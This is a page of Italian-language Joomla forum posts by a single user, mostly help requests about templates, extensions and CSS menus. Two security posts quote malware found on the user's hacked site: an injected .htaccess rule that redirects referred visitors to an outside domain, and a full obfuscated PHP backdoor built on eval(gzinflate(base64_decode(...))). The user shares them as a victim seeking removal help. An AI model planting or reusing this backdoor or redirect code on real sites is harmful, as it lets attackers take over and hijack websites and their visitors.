Visualizza post

Questa sezione ti permette di visualizzare tutti i post inviati da questo utente. N.B: puoi vedere solo i post relativi alle aree dove hai l'accesso.


Post - emy_aeon

Pagine: [1] 2 3
1
I Template di Joomla! 3 / Re:Gantry e PHP 7.2
« il: 06 Dic 2018, 16:49:47 »
Purtroppo devo confermarti che il problema NON è Gantry ma il template...
Ho disinstallato gantry e l'ho reistallato ed ho fatto lo stesso con il template...non mi dava più il problema con Gantry ma mi dava la stessa lista di errori citando però le librerie di Helix (altro frameword).A questo punto ho rinunciato ed ho cambiato template, per assurdo ho fatto prima!

2
Ciao a tutti,ho un problema con Acymail... se cerco di creare una nuova lista e clicco su salva, automaticamente viene chiusa la scermata e vengo rimandata alla pagina di login come se avessi cliccato su ESCI dal pannello di controllo.... quindi di fatto non si può salvare nulla!
questo è il link che ho sul browser dopo aver tentato di salvare:
http://www.MYWEBSITE.IO/administrator/index.php?option=com_acymailing&ctrl=list
La stessa cosa me la fa se provo a modificare una lista esistente e se provo ad inserire un nuovo utente!
Ovviamente ho verificato che non fosse un problema di sessione, ho aggiornato sul pannello di controllo a 60 secondi (salvo su db non su file php)... che fare?

3
I Template di Joomla! 3 / [RISOLTO] - Gantry e PHP 7.2
« il: 05 Dic 2018, 13:06:41 »
Ciao a tutti,ho un problema con Gantry da quando ho aggiornato la versione php.Ho passato il sito alla versione 7.2 e da quel dì Gantry è andato giù segnalandomi una serie di errori :
Deprecated: Function create_function() is deprecated in /web/htdocs/MYSITE/home/libraries/gantry/core/gantry.class.php on line 1043
 
 Deprecated: Function create_function() is deprecated in /web/htdocs/MYSITE/home/libraries/gantry/core/gantry.class.php on line 1043
 
 Deprecated: Function create_function() is deprecated in /web/htdocs/MYSITE/home/libraries/gantry/core/gantry.class.php on line 1043 

 Deprecated: Function create_function() is deprecated in /web/htdocs/MYSITE/home/libraries/gantry/core/renderers/gantrymodulesrenderer.class.php on line 85

 Deprecated: Function create_function() is deprecated in /web/htdocs/MYSITE/home/libraries/gantry/core/gantry.class.php on line 1043
 
 Deprecated: Function create_function() is deprecated in /web/htdocs/MYSITE/home/libraries/gantry/core/gantry.class.php on line 1043
 
 Deprecated: Function create_function() is deprecated in /web/htdocs/MYSITE/home/libraries/gantry/core/gantry.class.php on line 1043
 
 Warning: require_once(/web/htdocs/MYSITE/home/libraries/joomla/document/html/renderer/head.php): failed to open stream: No such file or directory in /web/htdocs/MYSITE/home/templates/jd_newjersey/error.php on line 68
 
 Fatal error: require_once(): Failed opening required '/web/htdocs/MYSITE/home/libraries/joomla/document/html/renderer/head.php' (include_path='.:/php7.2/lib/php') in /web/htdocs/MYSITE/home/templates/jd_newjersey/error.php on line 68


sul changelog e sul sito Gantry assicura piena compatibilità con PHP 7 (avevo già sul sito la v5), nel dubbio l'ho disinstallata e reinstallata scaricando l'ultimissima versione... ma niente, sempre questi errori.

Aiutoooooooooooo
 

4
Joomla! 3 / Assegnare template ad un solo articolo
« il: 13 Gen 2018, 12:33:58 »
Ciao a tutti,
come faccio ad assegnare un template diverso ad un singolo articolo?

5
Joomla! 3 / [RISOLTO] Far "sparire" moduli in caso di mobile
« il: 04 Set 2017, 17:18:20 »
Perfetto!
Con Advance Module Manager sono riuscita a far tutto!

Grazie $Red!!

6
Joomla! 3 / Re:Wrapper Module in articolo non funzionante
« il: 04 Set 2017, 15:36:12 »
Si... e nulla ... un quadrato bianco a prescindere dall'url inserito!

su tutti i browsers... ma c'è qualche filtro attivo forse?


7
Joomla! 3 / Far "sparire" moduli in caso di mobile
« il: 02 Set 2017, 19:22:28 »
Ciao a tutti,
ho una domanda, è possibile far "sparire" dei moduli in caso di mobile?


8
Joomla! 3 / Wrapper Module in articolo non funzionante
« il: 02 Set 2017, 19:20:12 »
Ciao a tutti,
ho un problema con il wrapper module su joomla 3
Ho creato il modulo con realtivo url e creato una posizione personalizzata "myposition" perché l'iframe deve stare all'interno di un articolo.

Così ho creato l'articolo ed inserito {loadposition myposition} per fare apparire il wrapper ma nulla!

Ho provato a non usare {loadposition} ma caricare il modulo dall'editor ma niente.... ho cambiato browser, eliminato cache... ma nulla...

magari, ho pensato, il problema è il link così ho provato un altra ULR sicuramente funzionante (ho messo forum.joomla.it per provare) ma nulla... spazio vuoto!

Cosa ho sbagliato?

9
Joomla! 3 / Facebook Fanbox non visibile!
« il: 14 Apr 2017, 08:39:00 »
Ciao a tutti,
ho un problema con la Facebook Fanbox su joomla 3.

Ho provato quasi tutte le estensioni, commerciali e non ed il risultato è sempre lo stesso, dopo aver fatto tutti i settaggi e determinato la posizione mi ritrovo o un bel quadrato bianco al posto della pagina fb o un link con il nome della pagina che effettivamente funziona ma io volevo "incorporare" la pagina fb nella home, non avere un link (vedi immagine allegata)!

Ho abbandonato le estensioni e provato ad inserire direttamente lo script ottenuto da qui https://developers.facebook.com/docs/plugins/page-plugin ma il risultato è il medesimo.

Stessa cosa con iframe (ho installato un plugin ad hoc).

Premetto che la stessa pagina è stata già incorporata utilizzando il plugin "Facebook Fanbox" sullo stesso sito quando avevo la piattaforma 2.5.6 e tutto funzionava perfettamente.

Cosa ho sbagliato?


10
Joomla! 3 / Tz Portfolio - Text Size
« il: 01 Apr 2017, 19:00:06 »
Scusate, probabilmente tra le mille impostazioni di Tz Portfolio ho inavvertitamente attivato l'opzione di TEXT-SIZE... ed ora mi ritrovo nella home un banner con i tasti per  ridimensionare il testo che non riesco più a togliere....  qualcuno sa a quale impostazione fa capo?

11
Joomla! 3 / Tz-Portfolio... nessun articolo!
« il: 14 Mar 2017, 08:26:06 »
Ciao a tutti,
per utilizzare questo componente, del quale ho sentito ottimi pareri, ho migrato tutti i miei articoli da k2 a com_content, così da poter utilizzare serenamente Tz-Portfolio.

Purtroppo quando creo una nuova voce di menu "portfolio" per pubblicare tutti gli articoli di una determinata categoria non solo non mi trovo le mie categorie, che esistono in com_content... ma non mi trovo nemmeno gli articoli (che sono un centinaio).. praticamente per Tz-Portfolio il mio sito è vuoto!

Che cosa ho sbagliato?
 :-\

12
Gallerie di immagini / Griglia immagini su homepage
« il: 17 Gen 2017, 10:03:27 »
Ciao a tutti,
qualcuno conosce un componente per joomla 2.5 che mi permetterebbe di inserire un immagine linkata ad un articolo come un qualsiasi slideshow, ma invece di avere l'animazione che le fa comparire una per volta mi presenta tutte le immagini in una griglia?
Allego uno screenshot per far capire l'effetto che cerco...

 

13
No no non si tratta di un menu da mettere come modulo nel template... che ci fossero lo sapevo anche io... si tratta solo di un elenco puntato all'interno di un articolo da rendere graficamente appetibile perché altrimenti sarebbe troppo lungo tra voci e sottovoci, per questo avevo pensato alla storia dell' :hover!

14
Ciao a tutti;

spero di non aver sbagliato sezione.... ho bisogno di una manina per fare un menu a discesa solo con html e css (quindi niente jquery), che dovrò inserire dentro un articolo.

Il menu si dovrebbe sviluppare in verticale perché lo spazio è veramente risibile... praticamente deve essere un elenco puntato che, quando vai con il mouse sopra la voce d'interesse, questa si estende e fa vedere le sottovoci del menu in questione... tipo:

         - PRIMA VOCE

         - SECONDA VOCE

         - TERZA VOCEQuando tu sei col mouse sopra la parola PRIMA VOCE, il menu si svilupperebbe così:

         - PRIMA VOCE
                   - prima sottovoce menu
                   - seconda sottovoce menu
                  - terza sottovoce menu
          - SECONDA VOCE
          - TERZA VOCE
So che una cosa del genere si può fare con il selettore :hover... ho fatto tantissime prove ma non mi riesce!!! sicuramente sbaglio qualcosa nell'attribuire le classi alle varie voci/sottovoci del menu
Potete darmi una mano??




15
nooooooooooooooooooooooo.... non ci posso credere!

La cosa più imbecille avevo saltato... Pensavo che era implicito, d'altronde se io creo un form è ovvio che lo voglio pubblicato!... invece no... scusate!

Ed il premio di "più veloce risoluzione nel forum" va a... BelinBelan!

Grazie

16
Gestione Form / Chronoforms... tutto ok ma pagina vuota!
« il: 22 Ott 2013, 11:08:26 »
Ciao a tutti!

Ho un piccolo problema con Chronoform, sicuramente è una cavolata ma, non avendolo mai usato posso essermi scordata qualcosa per strada...

Ho creato un form, impostato i vari fields, assegnato agli stessi nomi ed azioni (come ad esempio il controllo della mail, etc etc) con il wizard, impostato il tasto sumbmit e quello reset, salvo tutto e pubblico... clicco sul link per vedere un'anteprima e mi si para davanti una pagina completamente vuota con sopra la scritta : "
Powered By ChronoForms - ChronoEngine.com"... insomma niente modulo di iscrizione?

quale pasaggio ho saltato?

17
Ciao a tutti, spero di non essere off topic.... purtroppo non so in quale sezione inserire la domanda!

Vi spiego il mio problema, dovrei preparare un sito web che si occupa di viaggi... ho tutto pronto, template, articoli etc etc.... avrei solo un problema: devo creare, sulla pagina principale il classico form nel quale si trova l'elenco delle destinazioni disponibili ed il periodo, una cosa del genere insomma:



Una sorta di filtro che come risultato da i viaggi disponibili per la destinazione ed il periodo scelti... sia la destinazione che il periodo devono essere menu a tendina in quanto le scelte sono limitate....

Esiste un'estensione per fare questo?

Spero possiate aiutarmi...

18
Sicurezza / Re:Tentativo di Hijack
« il: 29 Gen 2013, 09:58:43 »
Mi rispondo da sola, sperando possa essere questa la soluzione definitiva al problema e che possa essere utile a qualcuno.

In attesa di trovare un modo più semplice per sistemare il problema ho provato una soluzione FAI DA TE.

quel file .htaccess con con quel codice indicato sopra è legato ad una pagina php che si chiama default.php (che non è la default.php "di default" - mi si perdonerà la ripetizione- della piattaforma) ma una pagina nuova di zecca che ha questo codice:

Codice: [Seleziona]
<?php eval(gzinflate(base64_decode("DZRFrsRYAgTvMqtueWF6Js3KjOUy02ZkxjLz6ee fIBXKyCzPdPinftuxGtK9/CdLt5IE/yvKfCrKf/4jJR9UXHydrYWTXizCiVl4EjIeT9CexwvcW6FXgrplMg4aOSQLzgLPTB0FcguDgXUFzvKJpvoJhl9BijN29RkdJW4mSBhP7a79VBDm69X7YHYJTjvaytOsNZ2zV12qdvApUY5rHYwryE8I4/z4irrzumxtUHrfalEdUa3oyyM032IjT0h8ggvUzE4M0+tjzaRpg2/dQsJG28YE85QnUVNo1dzrm8L8h3/wycZD6HOcuVe7e42DJ5ZoRR+kGASHbi9Ha4VIXDuzvwQZjwBUCOJ0+cYvcF8e2ZPg+V3ZAxHtj4Em+adNBirH8ctOW4+zceWS9+f6ro4SWLH0xWZ1He8IHkegsQ20ZAJwCrMGTSBF0rPvP2Vjz178feG6PVAJQYL209QLUL8FW1ZsJfKTsJlLjwmnYi4zb4ulv66kbEG4/OaDHiow5L3GNd6TRzfH81FhwZ0jnLmRnLZRrUejcmrvKOTsjbQIc0wPaK36xvJ5S+LY1HV6VvdpUaL1H8MKWkY/7SIQj40sra3qFOT8huIpKznoLG/HTjhwMbpT0Ac4S1tkSyvIJLwMlhGGSYDLgXw4kM4Gr0lbWvb+cBRFGP9jV3lG4fW0Yis8UFJniIPJyqsjqcumhXJo75i8aMsc96ZXWc7aYQf5IzWFXMzHy+3N+3xFQ9TRi1pgFqXmMkcSzXdingavGpnylYiq8Pbid+zSGFVzkSGe2uOd2InE310cU2BYmEOYOMIr01/EXILMdFTszoj0CEYz0sAu1KH3mmusFm6UKfEws8z+gdTKRZZG/GszPNwGcJ7r9Zo4divUR0LUQbI7ZkWCULvbglSsBqc4xTRBNrqHR6zeTINbVefVc31gTcP8MICc4MlnMlsc1ZyAa901XcS5atGHQlKJjAlhyHBLkiRmEo/WLjMxSPfl6gbcFe8xiGZJU/6hBwJ5x7FvSnxIO0KGL/MugUd++J8nn+8z+enEJ8b50MDspxlD46uxOXL5YgbTuX4KhfP6Ldtenkwh41D6mNnUantTKPlW6M5cMu1adVs1vWW01KS2l4JHBPvne9NN/1oZ249b/r5o03b8FcBOohbdL0cRYbwtrZELhPtzJ8AZ0rcTrMXjDIvLW/NQYRJG8PKMXMO70KpMfXF04SbMQyPStB1D5ZawQa0GOxz3Z05z1V3aiWpq37LaKE+7MxvrYqmhSIk1PArsp0Tmbh2QlFcxmQICDQt1E7K3o/RyYddS4hJM79fcAF2bfMxRSc3cli62zQbb5De617Dgw6qJt4N1kVu3qEb7+x3L2sGuI4iNJ6eKSMRaTNdb9A48dfwQcFG6olNRSehezblXukyzeWOl3yw3K+A0CIC+827MT0qRT0LCRUfX/WajWUxTmI8+cuOEeqji2fGLsHsBJ3D48hHN8dIWrvISYeJFhLKzMSzibSgpdjJg6nlkzjwd+8cc72cz1KDGL60Onp6ilEShKn729/MHKmy/AMGltaNQ3RWf0/pSfUm+huFig1K4esscCIeGg3VNuKBJZvvnP7Gt6/boTdKsYpbywnkQaQCISmAR12/d7zNE7TUvJddQ03WzDUZ1IMB90b8jY8b2OpWmyeFWs8ayuWUdvV6F7ER+pV0+ZW/HsxYY30DKybVuOwpwg7j9DQbeiA9USKDPqTs8KE7Y54qOsky0Kbk7U+1+t/qAxP6Tg60f8WMP2FJiDWVUwdmCebI351pnsceQvIbvWCQLqZraDhTT/XT6UI0idCjU1wGFtpiYwESvTzXMl0P1cw+0ATLH7+FUIKSyKnVs+ahxN4i4sb1t1iag8QuidgxP9AqZlPdf+xwyusFCgXt6AdnMvwfKROXTybjUptOE9LVv9x4kMl7Mu8117uSNne08rG0z/l4RJ8tRmQrJoCYG5BQu0AMFUOfs+sF7a87jJ/tm5eto/7BgimAYBobhD/yff//997//Bw=="))); ?>

questi 2 file ricicciano sempre in coppia così,  armata di santa pazienza mi sono messa a scovare questi due files IN OGNI CARTELLA ed a cancellarli MANUALMENTE (ovviamente stando attenta a non cancellare le VERE pagine default.php dei moduli o dei templates), li ho trovati nelle seguente cartelle:
  • plugins
  • modules
  • libraries
  • language
  • includes
  • components
  • cli
  • cache
Li ho cancellati entrambi e sembra non siano più presenti.
FORSE SI E' RISOLTO?
Resto in attesa...



19
Sicurezza / Tentativo di Hijack
« il: 29 Gen 2013, 09:29:37 »
Salve a tutti;

ieri il mio sito è stato down per tutto il pomeriggio:
  • ho controllato il db e stava tutto a posto
  • ho controllato i permessi delle cartelle ed anche quelli stavano ok
  • nessuno degli editor del sito aveva fatto modifiche nel pomeriggio quindi non si capiva cosa era successo.
A senso ho visto, tramite Filezilla, quali erano gli ultimi files che avevano subito modifica.
Era presente il file .htaccess modificato intorno alle 15.00... l'ho aperto con l'editor e ci ho trovato dentro questa sorpresina:

Codice: [Seleziona]
<IfModule mod_rewrite.c>

RewriteEngine On

RewriteBase /

RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+)

RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC]

RewriteRule ^.*$ http://darwinawards.fr/wami.html?h=1291289 [L,R]

</IfModule>

mi sono informata sul web ed ho trovato questo forum che ne parla, dice che è un tipo hijacking

http://www.betaarchive.com/forum/viewtopic.php?t=27202

li per li mi sono limitata a cancellare il file .htaccess dalla root del sito e tutto è tornato online e funzionante...

MA questo files me lo vedo replicato un pò in tutte le cartelle (libraries, includes, etc...), sembra quasi che si replica da solo (e lo dicono anche del forum del link postato sopra).. io lo cancello e quello al primo F5 riciccia!
Così ho tagliato la testa al toro, dopo un piccolo backup, ed ho reistallato tutta la piattaforma da zero, scaricandomi ex novo i pacchetti della versione dal sito joomla e sovrascrivendole alle vecchie cartelle.


Peccato che non sia servito nulla!

Malgrado nella root non ci sia più l'ombra di questo .htaccess "infetto" e che il sito sia perfettamente online e funzionante, nelle altre cartelle continua a comparire questo file!!!

Come posso liberarmi definitivamente di questo "ospite indesiderato"?
Qualcuno ha avuto a che fare con questo tipo di hijack?

20
Editor / RISOLTO:Editor Pop-Up
« il: 06 Ott 2012, 12:11:26 »
Confermo!
era la disposizione delle icone che "spingeva" oltre l'editor... ridisponendole è tornato tutto ok...

grazie mille!!!

Pagine: [1] 2 3

Torna su